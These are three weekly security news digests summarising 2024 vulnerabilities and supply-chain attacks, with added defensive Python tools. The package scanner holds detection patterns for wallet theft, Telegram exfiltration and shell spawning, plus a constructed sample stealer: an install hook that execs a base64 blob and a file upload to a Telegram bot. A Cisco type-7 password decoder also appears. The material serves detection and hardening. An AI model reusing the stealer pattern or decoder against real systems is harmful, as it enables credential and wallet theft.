
Programmer’s Digest #95

08/07/2024-08/14/2024 Microsoft Issues Patches for 90 Flaws, Rogue PyPI Library Targets Solana Users, Patch Released for High-Severity OpenSSH Vulnerability And More.

1. Microsoft Issues Patches for 90 Flaws, Including 10 Critical Zero-Day Exploits

Microsoft released fixes for 90 security flaws, including 10 zero-days, six of which were already being exploited in the wild. Of the 90, seven are rated Critical, 79 Important and one Moderate. A further 36 vulnerabilities in the Edge browser have been fixed since last month's Patch Tuesday.

The six actively exploited zero-days are:

  • CVE-2024-38189: Microsoft Project Remote Code Execution (CVSS 8.8)
  • CVE-2024-38178: Windows Scripting Engine Memory Corruption (CVSS 7.5)
  • CVE-2024-38193: WinSock Elevation of Privilege (CVSS 7.8)
  • CVE-2024-38106: Windows Kernel Elevation of Privilege (CVSS 7.0)
  • CVE-2024-38107: Power Dependency Coordinator Elevation of Privilege (CVSS 7.8)
  • CVE-2024-38213: Mark of the Web Security Feature Bypass (CVSS 6.5)

CVE-2024-38213, a bypass of the Mark of the Web check that lets a downloaded file skip the SmartScreen prompt, was reported by Trend Micro's Peter Girnus. CISA has added all six exploited flaws to its Known Exploited Vulnerabilities (KEV) catalog. The other four zero-days were publicly known before the patches shipped; among them is a Microsoft Office spoofing vulnerability (CVE-2024-38200, CVSS 7.5) that a phishing lure can use to make Office leak the victim's NTLM hash to an attacker-controlled server. Microsoft also fixed a Print Spooler privilege escalation flaw (CVE-2024-38198, CVSS 7.8), but has not yet released updates for CVE-2024-38202 and CVE-2024-21302, the two issues behind the Windows Update downgrade ("Windows Downdate") attack shown at Black Hat. Separately, Fortra reported a denial-of-service flaw in the Common Log File System (CLFS) driver (CVE-2024-6768, CVSS 6.8) that remains unpatched; Microsoft says it will be addressed in a future update.

2. Rogue PyPI Library Targets Solana Users, Steals Blockchain Wallet Keys

Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) that masquerades as a library for the Solana blockchain platform but is designed to steal victims' secrets. The rogue "solana-py" package was downloaded 1,122 times after it was published on August 4, 2024, and has since been removed from PyPI.

The naming is the interesting part. The legitimate client library is published on PyPI as "solana", but its GitHub project is called "solana-py", so documentation across the ecosystem routinely refers to it by that name. The attacker registered the unclaimed "solana-py" name on PyPI and shipped it with version numbers 0.34.3, 0.34.4 and 0.34.5, 0.34.3 being the latest release of the genuine "solana" package at the time. Anyone who searched PyPI for the project name they saw in the docs, or who "upgraded" to what looked like a newer release, would get the imposter.

That is what makes this a supply chain risk rather than a simple typo trap: Sonatype's investigation found that legitimate libraries such as "solders" mention "solana-py" in their PyPI documentation, so a developer following those docs could have pulled the malicious package into their own application and, with it, a crypto stealer.
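The check below is an added example, not code from the page, from Sonatype or from the solana project. It flags a requested distribution name that is a near match for a package you already depend on, and escalates to a block when the look-alike also publishes the real package's latest version number (the trick solana-py used). The baseline of known-good names and versions is constructed for the demo; in practice it would come from your lockfile and the PyPI JSON API.

```python
"""Pre-install check for look-alike PyPI distribution names.

Added example (not code from the page, from Sonatype, or from the solana
project). The baseline of known-good names and their latest versions is
constructed for the demo; in practice it would come from your lockfile or an
internal allowlist, and the version data from the PyPI JSON API.
"""
import re
from difflib import SequenceMatcher

# Constructed baseline: distributions the project legitimately depends on and
# the latest version seen on PyPI for each at the time of the check.
KNOWN_GOOD = {
    "solana": "0.34.3",
    "solders": "0.21.0",
    "requests": "2.32.3",
}

# Affixes typosquatters commonly bolt onto a real name ("solana" -> "solana-py").
SUSPICIOUS_AFFIXES = ("python-", "py-", "-python", "-py", "-lib", "-sdk")

def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-insensitive, runs of -_. become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()

def strip_affixes(name: str) -> str:
    for affix in SUSPICIOUS_AFFIXES:
        if name.startswith(affix):
            name = name[len(affix):]
        elif name.endswith(affix):
            name = name[:-len(affix)]
    return name

def lookalike_of(candidate: str, baseline=KNOWN_GOOD, threshold: float = 0.85):
    """Return the baseline name that `candidate` most resembles, or None."""
    cand = normalize(candidate)
    if cand in baseline:
        return None                      # exact known-good name, nothing to flag
    stripped = strip_affixes(cand)
    best, best_score = None, 0.0
    for good in baseline:
        if stripped == normalize(good):
            return good                  # e.g. "solana-py" -> "solana"
        score = SequenceMatcher(None, cand, normalize(good)).ratio()
        if score > best_score:
            best, best_score = good, score
    return best if best_score >= threshold else None

def version_key(v: str):
    """'0.34.3' -> (0, 34, 3); digits in any suffix are appended as extra parts."""
    return tuple(int(p) for p in re.findall(r"\d+", v))

def version_shadows(candidate_versions, target_latest: str) -> bool:
    """True if the look-alike publishes the target's latest version number or
    one just past it, the way solana-py mirrored solana 0.34.3."""
    t = version_key(target_latest)
    return any(version_key(v) >= t for v in candidate_versions)

def assess(candidate: str, candidate_versions):
    """Return (verdict, reason) for one requested distribution name."""
    target = lookalike_of(candidate)
    if target is None:
        return "ok", "no look-alike in baseline"
    if version_shadows(candidate_versions, KNOWN_GOOD[target]):
        return "block", f"{candidate} resembles {target} and shadows its version {KNOWN_GOOD[target]}"
    return "review", f"{candidate} resembles {target}"

if __name__ == "__main__":
    for name, versions in [("solana-py", ["0.34.3", "0.34.4", "0.34.5"]),
                           ("solana", ["0.34.3"]),
                           ("reqeusts", ["0.1.0"])]:
        print(name, assess(name, versions))
```

The affix stripping is what catches the solana-py case, since plain edit distance between "solana" and "solana-py" is not close enough to trip a similarity threshold; the version comparison turns a "looks similar" warning into a hard block, because a look-alike that tracks the real package's version numbers is almost never accidental. Run it from a pre-install hook or CI step over the names in a requirements file before `pip install`, and pair it with `--require-hashes` so that a name that passes still has to match a pinned artifact.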

3. Ivanti Virtual Traffic Manager Flaw Let Hackers Create Rogue Admin Accounts

Ivanti Virtual Traffic Manager (vTM) has a critical authentication bypass vulnerability, tracked as CVE-2024-7593 with a CVSS score of 9.8, for which Ivanti has published a patch and a security advisory. The root cause is an incorrect implementation of the authentication algorithm in vTM: an unauthenticated remote attacker can bypass authentication on the admin panel and perform administrative actions, including creating a new administrator account to keep as a backdoor.

All vTM releases other than 22.2R1 and 22.7R2 are affected, so anything else in service needs to be upgraded. Independently of the patch, Ivanti advises restricting access to the management interface: bind it to a private IP address and limit which networks can reach it, since the bypass is only reachable by whoever can talk to the admin port. If an instance was exposed before patching, review its local administrator accounts for additions you do not recognise.

4. Urgent Patch Released for High-Severity OpenSSH Vulnerability on FreeBSD

On August 12, 2024, the FreeBSD Project released a security advisory and patches for a high-severity vulnerability in OpenSSH, tracked as CVE-2024-7589 (CVSS 7.4), that could let a remote, unauthenticated attacker execute arbitrary code with elevated privileges.
The flaw is a race condition in a signal handler of the sshd(8) daemon. When a client has not authenticated within LoginGraceTime (120 seconds by default), a SIGALRM handler runs, and in FreeBSD's build that handler can call a logging function that is not async-signal-safe. Because the handler executes in sshd's privileged parent process, which is neither sandboxed nor privilege-separated, an attacker who wins the race gets code execution as root. It is the same class of bug as the regreSSHion flaw (CVE-2024-6387) disclosed in July; this instance was introduced by FreeBSD's integration of blacklistd into sshd.

Upgrade to a patched FreeBSD release (freebsd-update or a rebuild from source) and restart sshd(8) afterwards, since the running daemon keeps the old code until it is restarted. If patching has to wait, setting LoginGraceTime 0 in /etc/ssh/sshd_config disables the timeout and with it the vulnerable handler, at the cost of making sshd easier to tie up with idle connections.

5. Microsoft Reveals Four OpenVPN Flaws Leading to Potential RCE and LPE

On August 8, 2024, Microsoft disclosed four medium-severity security flaws in the open-source OpenVPN software that can be chained into remote code execution (RCE) and local privilege escalation (LPE). A successful chain gives an attacker full control of the endpoint, with the data theft and lateral movement that follow. OpenVPN fixed all four in versions 2.6.10 and 2.5.10, released in March 2024; installations still on older builds should be updated.

The list of vulnerabilities is as follows:

  • CVE-2024-27459: Stack overflow vulnerability causing DoS and LPE in Windows.
  • CVE-2024-24974: Unauthorized access to the “\openvpn\service” named pipe in Windows, allowing remote operations.
  • CVE-2024-27903: Plugin mechanism vulnerability leading to RCE in Windows and LPE/data manipulation in Android, iOS, macOS, and BSD.
  • CVE-2024-1305: Memory overflow vulnerability causing DoS in Windows.

The first three of the four flaws are in openvpnserv, the Windows service that the OpenVPN GUI talks to over a named pipe; the last one is in the Windows TAP driver. Microsoft notes that at least three of the four can be turned into working RCE or LPE exploits that chain together into a full attack. The bar is not zero, though: the attacker first needs valid OpenVPN user credentials on the target and a detailed understanding of OpenVPN's internals, so the chain is a post-authentication problem rather than a drive-by one.

6. CISA Warns of Hackers Exploiting Legacy Cisco Smart Install Feature

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has warned that threat actors are abusing the legacy Cisco Smart Install (SMI) feature to pull system configuration files from network devices. Smart Install listens on TCP port 4786 with no authentication, so on a switch where it has been left enabled, anyone who can reach that port can download the startup configuration, stored credentials included. The fix is to disable it with the "no vstack" command on devices that do not need it, and to block TCP/4786 at the network boundary.

CISA also called out the prevalence of weak password storage in Cisco device configurations, which leaves harvested configs open to offline cracking: type 7 passwords are trivially reversible, type 4 is a single unsalted SHA-256 round, and type 5 is MD5-based crypt, both fast to brute-force. The agency recommends type 8 (PBKDF2-SHA256) protection for all stored passwords and points to the NSA's Smart Install Protocol Misuse advisory for configuration guidance. Separately, Cisco has warned of critical flaws in its Smart Software Manager On-Prem (CVE-2024-20419) and in SPA300 and SPA500 Series IP Phones (CVE-2024-20450, CVE-2024-20452, CVE-2024-20454) that can lead to unauthorized access, arbitrary command execution or denial of service.
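The audit below is an added example, not tooling from CISA, the NSA or Cisco. It walks a Cisco IOS running-config, flags every credential stored with anything weaker than type 8 or 9, decodes type 7 strings on the spot to drive home that they are obfuscation rather than encryption, and reports if Smart Install has not been disabled with "no vstack". The sample configuration is constructed; the type 7 key and the "0822455D0A16" test vector are the long-public ones, and the $8$ / $9$ strings are illustrative values only.

```python
"""Audit a Cisco IOS running-config for the two problems CISA calls out:
weak or reversible password storage and Smart Install left enabled.

Added example, not from CISA, the NSA or Cisco. The configuration text is
constructed; the type-7 key and the "cisco" test vector are the public ones.
"""
import re

# Type 7 "encryption" is an XOR against this fixed key, public for decades.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"

def decode_type7(blob: str) -> str:
    """Reverse a 'password 7' string. The first two chars are the key offset."""
    seed = int(blob[:2])
    data = bytes.fromhex(blob[2:])
    return "".join(chr(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)])
                   for i, b in enumerate(data))

# Only 8 (PBKDF2-SHA256) and 9 (scrypt) are acceptable: 4 is unsalted
# single-round SHA-256, 5 is MD5 crypt, 7 is reversible, no type is cleartext.
TYPE_VERDICT = {
    "0": "cleartext", "7": "reversible", "4": "weak (unsalted SHA-256)",
    "5": "weak (MD5)", "8": "ok", "9": "ok",
}

PASSWORD_LINE = re.compile(
    r"^(?P<prefix>enable (?:secret|password)|username \S+ (?:secret|password))"
    r"(?:\s+(?P<type>\d))?\s+(?P<value>\S+)$"
)

def audit_config(config: str):
    """Return (line, finding) tuples for weak credentials and Smart Install."""
    findings = []
    smart_install_disabled = False
    for raw in config.splitlines():
        line = raw.strip()
        if line == "no vstack":
            smart_install_disabled = True
            continue
        m = PASSWORD_LINE.match(line)
        if not m:
            continue
        ptype = m.group("type") or "0"          # no type keyword = cleartext
        verdict = TYPE_VERDICT.get(ptype, f"unknown type {ptype}")
        if verdict == "ok":
            continue
        if ptype == "7":
            verdict += f"; decodes to {decode_type7(m.group('value'))!r}"
        findings.append((line, verdict))
    if not smart_install_disabled:
        findings.append(("(global)", "Smart Install not disabled: add 'no vstack'"))
    return findings

# Constructed sample config mixing weak and acceptable settings.
SAMPLE_CONFIG = """\
hostname edge-sw01
enable secret 5 $1$mERr$hx5rVt7rPNoS4wqbXKX7m0
username admin password 7 0822455D0A16
username guest password Sample123
username ops secret 8 $8$dsYGNam3K1SIJO$7nv/35M/qr6t.dVbR.xeE1ig.5J0bNo0a3vgLdZDh2k
username svc secret 9 $9$nhEmQVczB7dqsO$X.HsgL6x1il0RxkOSSvyQYwucySCt7qFm4v7pqCxkKM
"""

if __name__ == "__main__":
    for line, note in audit_config(SAMPLE_CONFIG):
        print(f"{note:45} <- {line}")
```

Feed it the output of `show running-config` collected by whatever you already use for config backups. The type 7 decode is the point of the exercise: a config pulled through Smart Install on a device that still uses type 7 hands the attacker the plaintext without any cracking at all, and type 5 is only a GPU-hour behind it.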


Programmer’s Digest #94

07/31/2024-08/07/2024 New Linux Kernel Exploit Technique ‘SLUBStick’, Critical Security Flaw in WhatsUp Gold, Malicious Python Packages And More.

1. New Linux Kernel Exploit Technique ‘SLUBStick’ Discovered by Researchers

Cybersecurity researchers have discovered a new Linux kernel exploitation technique called SLUBStick, which can elevate a limited heap vulnerability to an arbitrary memory read-and-write primitive. Researchers from Graz University of Technology explained that SLUBStick exploits a timing side-channel of the allocator for a reliable cross-cache attack, achieving a success rate above 99% for frequently used generic caches.

Memory safety bugs in the Linux kernel are typically hard to exploit reliably because of defenses such as SMAP, KASLR and kCFI; earlier cross-cache techniques succeeded only about 40% of the time. SLUBStick, demonstrated on Linux kernel versions 5.19 and 6.2 against nine vulnerabilities disclosed between 2021 and 2023, reaches root privilege escalation and container escapes while sidestepping KASLR. Its preconditions are an existing heap vulnerability and the ability to run code as an unprivileged local user. It is an exploitation technique rather than a vulnerability, so there is nothing to patch for SLUBStick itself; the practical defense remains fixing the heap bugs it relies on.

The researchers noted SLUBStick’s ability to exploit recent systems with a variety of heap vulnerabilities.

2. Critical Security Flaw in WhatsUp Gold Under Active Attack – Patch Now

A critical security flaw in Progress Software's WhatsUp Gold is under active exploitation, and users should apply the latest updates without delay. The vulnerability, CVE-2024-4885 (CVSS score: 9.8), is an unauthenticated remote code execution bug in versions before 2023.1.3: the GetFileWithoutZip method does not adequately validate user-supplied paths, which allows command execution with the privileges of the iisapppool\nmconsole account.

Exploitation attempts have been observed since August 1, 2024, following the release of a proof-of-concept exploit by researcher Sina Kheirkhah. Version 2023.1.3 also addresses two other critical flaws (CVE-2024-4883 and CVE-2024-4884) and a high-severity privilege escalation issue (CVE-2024-5009). Admins should apply the update and restrict access to the WhatsUp Gold console to trusted IP addresses.

3. 0.0.0.0 Day exploit reveals 18-year-old security flaw in Chrome, Safari, and Firefox

An 18-year-old weakness dubbed "0.0.0.0 Day" lets a malicious website reach services on a visitor's own machine through major browsers including Google Chrome, Mozilla Firefox and Apple Safari. A public web page is normally blocked, or gated by Private Network Access (PNA) checks, when its scripts try to contact 127.0.0.1 or localhost, but the browsers did not apply the same treatment to the "wildcard" address 0.0.0.0, and on Linux and macOS the operating system delivers a request for http://0.0.0.0:PORT to the local host. Windows is largely unaffected because it does not route 0.0.0.0 to loopback. Whatever is listening locally then receives an attacker-controlled request: depending on the service, that means changed settings, leaked data or remote code execution. The problem was first reported in 2008 and is still open, though fixes are in progress.

Researchers at Oligo Security have observed the technique being exploited in the wild, in campaigns aimed at AI workloads and Selenium Grid servers listening on local interfaces.
Browser developers are rolling out changes to block access to 0.0.0.0 outright. Until those land, the defenses are on the server side: honour PNA preflights and only answer them for trusted origins, verify the Host header against the names the service is meant to serve, and put HTTPS, authentication and CSRF tokens in front of anything listening on a local port.
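The request gate below is an added example, not code from Oligo Security or from any browser vendor. It shows the server-side half of the mitigations just listed for a service bound to a local port: refuse anything whose Host header is not a name you actually serve (a fetch to http://0.0.0.0:8000 arrives with Host "0.0.0.0:8000"), refuse cross-origin requests from origins you do not trust, and answer a Private Network Access preflight only for a trusted origin. The PNA header names are Chrome's; the allowed hosts, trusted origin and sample requests are constructed for the demo. CSRF tokens are not shown here.

```python
"""Request gate for a local development service.

Added example (not Oligo Security's or any browser vendor's code). ALLOWED_HOSTS
and TRUSTED_ORIGINS are assumptions for the demo; the PNA header names are the
ones Chrome uses.
"""

ALLOWED_HOSTS = {"localhost", "127.0.0.1", "[::1]"}   # assumption: names we serve
TRUSTED_ORIGINS = {"http://localhost:3000"}           # assumption: our own front-end

def _hostname(host_header: str) -> str:
    """Strip the port from a Host header, keeping IPv6 brackets intact."""
    if host_header.startswith("["):
        return host_header.split("]")[0] + "]"
    return host_header.split(":")[0]

def gate(method: str, headers: dict):
    """Decide how to treat one request: (status, extra response headers).

    403 refuses; 204 is a successful preflight; 200 passes the request on.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if _hostname(h.get("host", "")) not in ALLOWED_HOSTS:
        # A page that reached us via http://0.0.0.0:PORT lands here, and so does
        # DNS rebinding: the browser sends whatever name it was told to fetch.
        return 403, {}

    origin = h.get("origin")
    if origin is None:
        return 200, {}                  # same-origin navigation or non-browser client

    if origin not in TRUSTED_ORIGINS:
        return 403, {}                  # cross-site script: do not even answer the preflight

    resp = {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    if method == "OPTIONS":
        if h.get("access-control-request-private-network") == "true":
            # PNA: the browser asks before letting a public page talk to us.
            resp["Access-Control-Allow-Private-Network"] = "true"
        return 204, resp
    return 200, resp

# Constructed sample requests.
SAMPLES = {
    "direct":   ("GET", {"Host": "localhost:8000"}),
    "zero_day": ("POST", {"Host": "0.0.0.0:8000", "Origin": "https://evil.example"}),
    "evil_pna": ("OPTIONS", {"Host": "localhost:8000", "Origin": "https://evil.example",
                             "Access-Control-Request-Private-Network": "true"}),
    "own_pna":  ("OPTIONS", {"Host": "localhost:8000", "Origin": "http://localhost:3000",
                             "Access-Control-Request-Private-Network": "true"}),
}

if __name__ == "__main__":
    for name, (method, headers) in SAMPLES.items():
        print(name, gate(method, headers))
```

The Host check is the one that actually closes the 0.0.0.0 hole, because it does not depend on the browser doing anything; the Origin and PNA handling only help against browsers that send those headers. Note the order: a trusted-origin check that ran before the Host check would still let the 0.0.0.0 request through whenever the attacker's page is served from an origin you trust.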

4. Hackers Distributing Malicious Python Packages via Popular Developer Q&A Platform

Threat actors are tricking users into downloading malware via Stack Exchange, targeting developers with bogus Python packages that drain cryptocurrency wallets. 

The rogue packages include:

  • raydium (762 downloads)
  • raydium-sdk (137 downloads)
  • sol-instruct (115 downloads)
  • sol-structs (292 downloads)
  • spl-types (776 downloads)

These packages, downloaded 2,082 times, contained malware that stole data, including web browser passwords, cryptocurrency wallets, and messaging app information. They also captured screenshots and searched for sensitive files. The data was exfiltrated to Telegram bots. The malware included a backdoor for persistent remote access.

The attackers used Stack Exchange to promote these packages by posting seemingly helpful answers to developer questions. This campaign highlights the need for developers and organizations to reassess their security strategies to prevent supply chain attacks.
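The scanner below is an added example, not the code of any tool the page mentions. It does the pre-install vetting a developer could have applied to "spl-types" or "raydium" before trusting a Stack Exchange answer: unpack the source distribution in memory, look for an install-time hook in setup.py (code that runs during `pip install`, before anything is imported), and grep the Python files for the behaviours described above, namely exec of decoded blobs, Telegram bot API exfiltration, wallet and browser credential paths, screenshot libraries and shell spawning. The indicator list is a starting point rather than a signature set, and both sample packages are constructed in code and contain no working payload.

```python
"""Heuristic pre-install scan of a Python source distribution.

Added example, not the code of any scanner the page mentions. The indicator
list is a starting point, not a complete signature set; both sample packages
below are constructed in memory and carry no real payload.
"""
import ast
import io
import re
import tarfile

INDICATORS = {
    "exec_or_eval":    re.compile(r"\b(?:exec|eval)\s*\("),
    "base64_decode":   re.compile(r"b64decode|fromhex\("),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    "wallet_paths":    re.compile(r"Exodus|Electrum|Local Extension Settings|Login Data"),
    "screenshot":      re.compile(r"ImageGrab|pyautogui|\bmss\b"),
    "remote_shell":    re.compile(r"subprocess\.(?:Popen|run|call)|os\.system"),
}
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}

def install_hooks(setup_py: str):
    """setuptools command classes subclassed in setup.py (they run at install time)."""
    try:
        tree = ast.parse(setup_py)
    except SyntaxError:
        return ["<unparseable setup.py>"]
    hooks = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = getattr(base, "id", None) or getattr(base, "attr", None)
                if name in HOOK_BASES:
                    hooks.append(name)
    return hooks

def scan_sdist(data: bytes):
    """Scan .tar.gz bytes; returns {file: [indicators]} plus a '<setup.py hooks>' entry."""
    report = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith(".py"):
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
            if hits:
                report[member.name] = hits
            if member.name.endswith("setup.py"):
                hooks = install_hooks(text)
                if hooks:
                    report["<setup.py hooks>"] = hooks
    return report

def risk_score(report):
    """Crude weighting: an install hook is the strongest signal, exfil channel next."""
    score = 5 if "<setup.py hooks>" in report else 0
    weights = {"telegram_bot_api": 3, "wallet_paths": 2}
    for path, hits in report.items():
        if path != "<setup.py hooks>":
            score += sum(weights.get(h, 1) for h in hits)
    return score

def build_sdist(files: dict) -> bytes:
    """Constructed helper: pack {path: source} into an in-memory .tar.gz."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, src in files.items():
            blob = src.encode()
            info = tarfile.TarInfo(path)
            info.size = len(blob)
            tar.addfile(info, io.BytesIO(blob))
    return buf.getvalue()

# Constructed sample in the shape of the malicious packages (no working payload).
MALICIOUS_SAMPLE = build_sdist({
    "spl-types-0.1/setup.py": (
        "from setuptools import setup\n"
        "from setuptools.command.install import install\n"
        "class PostInstall(install):\n"
        "    def run(self):\n"
        "        import base64; exec(base64.b64decode('cGFzcw=='))\n"
        "        install.run(self)\n"
        "setup(name='spl-types', cmdclass={'install': PostInstall})\n"),
    "spl-types-0.1/spl_types/grab.py": (
        "import requests\n"
        "TOKEN = 'redacted'\n"
        "def send(data):\n"
        "    requests.post(f'https://api.telegram.org/bot{TOKEN}/sendDocument', files=data)\n"),
})
BENIGN_SAMPLE = build_sdist({
    "tiny-0.1/setup.py": "from setuptools import setup\nsetup(name='tiny')\n",
    "tiny-0.1/tiny/__init__.py": "def add(a, b):\n    return a + b\n",
})

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        rep = scan_sdist(blob)
        print(label, risk_score(rep), rep)
```

Download the artifact with `pip download --no-deps --no-binary :all: <name>` and point `scan_sdist` at the file before installing. The install-hook check matters most: a stealer wired into `cmdclass` fires during installation even if nobody ever imports the package, which is why the download counts above translated directly into compromised machines.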

5. North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

Threat actors in an ongoing malware campaign, dubbed DEV#POPPER and linked to North Korea, have expanded their tactics to target Windows, Linux, and macOS systems. This campaign targets software developers globally, including South Korea, North America, Europe, and the Middle East.

Securonix researchers revealed that the attackers pose as interviewers, urging candidates to download a ZIP file for a coding assignment. This file contains a malicious npm module that triggers the BeaverTail malware, which identifies the operating system and exfiltrates data.

The malware can also download additional payloads, including the InvisibleFerret Python backdoor, which steals system metadata and browser cookies and logs keystrokes. Newer samples add heavier obfuscation and install the AnyDesk remote-access tool for persistence. The reliance on commodity foreign software is notable for a heavily sanctioned state actor, which continues to import such technology to support its operations.


Programmer’s Digest #93

07/24/2024-07/31/2024 Flaw in Telerik, ConfusedFunction Flaw in Google Cloud, Critical Docker Engine Flaw And More.

1. Critical Flaw in Telerik Report Server Poses Remote Code Execution Risk

Progress Software urges users to update their Telerik Report Server instances due to a critical security flaw (CVE-2024-6327) with a CVSS score of 9.9. This vulnerability affects versions 2024 Q2 (10.1.24.514) and earlier and can lead to remote code execution via insecure deserialization. The flaw has been fixed in version 10.1.24.709.
For temporary mitigation, change the user for the Report Server Application Pool to one with limited permissions. Check server vulnerability by logging into the Report Server web UI, opening the Configuration page, and checking the version number under the About tab.

This disclosure follows another critical flaw (CVE-2024-4358) patched nearly two months ago, which CISA added to its Known Exploited Vulnerabilities catalog on June 13.

2. Researchers Uncover ConfusedFunction Flaw in Google Cloud

Tenable researchers discovered a privilege escalation flaw in Google Cloud Platform's (GCP) Cloud Functions service, which they named 'ConfusedFunction'. Creating or updating a function triggers a Cloud Build job, and that job runs under the default Cloud Build service account, which carries far broader permissions than the function itself needs.

An attacker who can deploy or modify a function, for example by slipping a malicious dependency into its build, can run code inside that build, capture the Cloud Build service account's token and use it to reach Cloud Build, Cloud Storage, Artifact Registry and Container Registry. From there they can move laterally and read or modify data the function was never authorised to touch.

After Tenable's report, Google partially fixed the issue: Cloud Functions created after mid-June 2024 now run their builds under the Compute Engine default service account instead, and Google published organization policies to constrain default service account usage. Functions created before the change keep the old behaviour until their build service account is changed by hand. Note also that the Compute Engine default service account is itself granted the Editor role on new projects unless the organization policy that disables automatic grants is enforced, so the swap alone does not get the build down to least privilege.

 

3. Critical Docker Engine Flaw Allows Attackers to Bypass Authorization Plugins

Docker warns of a critical flaw (CVE-2024-41110, CVSS 10.0) in certain Docker Engine versions that allows attackers to bypass authorization plugins (AuthZ). When an API request arrives with Content-Length set to 0, the daemon forwards it to the AuthZ plugin without the body, so the plugin makes its decision without seeing what the request actually does and may approve it incorrectly. The bug was originally fixed in Docker Engine 18.09.1 in January 2019, but the fix was not carried into later release branches and the flaw resurfaced from 19.03 onwards. It is fixed in Docker Engine 23.0.15, 26.1.5 and 27.1.1, released in July 2024. Only deployments that rely on an AuthZ plugin for access control are exposed; a default Docker Engine installation with no authorization plugin configured is not affected.

Affected versions include:

  • <= v19.03.15
  • <= v20.10.27
  • <= v23.0.14
  • <= v24.0.9
  • <= v25.0.5
  • <= v26.0.2
  • <= v26.1.4
  • <= v27.0.3, and
  • <= v27.1.0

Docker Desktop up to version 4.32.0 is also affected, but a fix is expected in version 4.33.

Users should update to the latest version to mitigate potential threats.
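The fleet check below is an added example, not Docker's own tooling. It turns the affected-version list above into a per-branch ceiling, classifies an engine version as affected, patched or outside the advisory, and combines that with whether the host actually loads an AuthZ plugin, which is the condition for exposure. The patched releases (23.0.15, 26.1.5, 27.1.1) are the ones in Docker's advisory; the sample version string, the daemon.json contents and the plugin name are constructed for the demo.

```python
"""Decide whether a Docker Engine host needs the CVE-2024-41110 fix.

Added example, not Docker's own tooling. The affected ceilings are the ones in
the advisory list; the patched releases are from Docker's advisory. The sample
inputs, including the plugin name, are constructed.
"""
import json
import re

# Highest affected patch level per release branch: (major, minor) -> patch.
AFFECTED_CEILING = {
    (19, 3): 15, (20, 10): 27, (23, 0): 14, (24, 0): 9, (25, 0): 5,
    (26, 0): 2, (26, 1): 4, (27, 0): 3, (27, 1): 0,
}
PATCHED = ("23.0.15", "26.1.5", "27.1.1")

def parse_version(text: str):
    """'27.1.0', 'v27.1.0-ce' or '19.03.15' -> (major, minor, patch)."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(x) for x in m.groups())

def engine_vulnerable(version: str):
    """'yes' / 'no' / 'unknown' (branch not covered by the advisory, e.g. 18.09)."""
    major, minor, patch = parse_version(version)
    ceiling = AFFECTED_CEILING.get((major, minor))
    if ceiling is None:
        return "unknown"
    return "yes" if patch <= ceiling else "no"

def authz_plugins(daemon_json: str):
    """Plugin names from the 'authorization-plugins' key of daemon.json."""
    try:
        cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    except json.JSONDecodeError:
        return []
    return list(cfg.get("authorization-plugins", []))

def assess_host(server_version: str, daemon_json: str):
    """Combine engine version and AuthZ configuration into (verdict, action)."""
    status = engine_vulnerable(server_version)
    plugins = authz_plugins(daemon_json)
    if status == "no":
        return "patched", "no action"
    if not plugins:
        return ("not exposed" if status == "yes" else "unknown",
                "no AuthZ plugin loaded; upgrade at the next maintenance window")
    return ("EXPOSED" if status == "yes" else "unknown",
            f"AuthZ plugin(s) {plugins} in use; upgrade to one of {PATCHED} now")

# Constructed inputs: what `docker version --format '{{.Server.Version}}'`
# and /etc/docker/daemon.json might contain on a host.
SAMPLE_VERSION = "27.1.0\n"
SAMPLE_DAEMON_JSON = '{"authorization-plugins": ["example/authz-plugin"], "log-level": "info"}'

if __name__ == "__main__":
    print(assess_host(SAMPLE_VERSION, SAMPLE_DAEMON_JSON))
    print(assess_host("27.1.1", SAMPLE_DAEMON_JSON))
    print(assess_host("26.1.4", "{}"))
```

Branches the advisory does not list (anything older than 19.03, or 21.x and 22.x builds from vendors) come back as "unknown" on purpose so they get a human look instead of a silent pass. The 19.03 and 20.10 branches are end-of-life and have no fixed release, so a "yes" there means moving to a supported branch, not waiting for a patch.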
 

4. CISA Warns of Exploitable Vulnerabilities in Popular BIND 9 DNS Software

The Internet Systems Consortium (ISC) has released patches for multiple vulnerabilities in the BIND 9 DNS software that could trigger denial-of-service (DoS) attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) identified four key vulnerabilities:

  • CVE-2024-4076 (CVSS 7.5): Logic error in lookups could cause an assertion failure.
  • CVE-2024-1975 (CVSS 7.5): Validating DNS messages with SIG(0) can overload CPU.
  • CVE-2024-1737 (CVSS 7.5): Excessive resource record types slow down processing.
  • CVE-2024-0760 (CVSS 7.5): Malicious queries over TCP can render the server unresponsive.

These flaws can cause unexpected termination, CPU resource depletion, and slow query processing. The issues are fixed in BIND 9 versions 9.18.28, 9.20.0, and 9.18.28-S1. There is no evidence of these vulnerabilities being exploited in the wild.

5. CrowdStrike Software Update Leads to Significant Global Tech Outage

CrowdStrike confirmed that a faulty content update for its Falcon sensor caused a worldwide outage, crashing roughly 8.5 million Windows devices on July 19, 2024. The update was a Rapid Response Content file intended to improve telemetry on a newly observed attack technique; a defect in it triggered an out-of-bounds memory read in the sensor's kernel-mode content interpreter, and affected machines fell into a blue-screen boot loop. Windows 10 and later hosts running the sensor were affected; Mac and Linux systems were not.

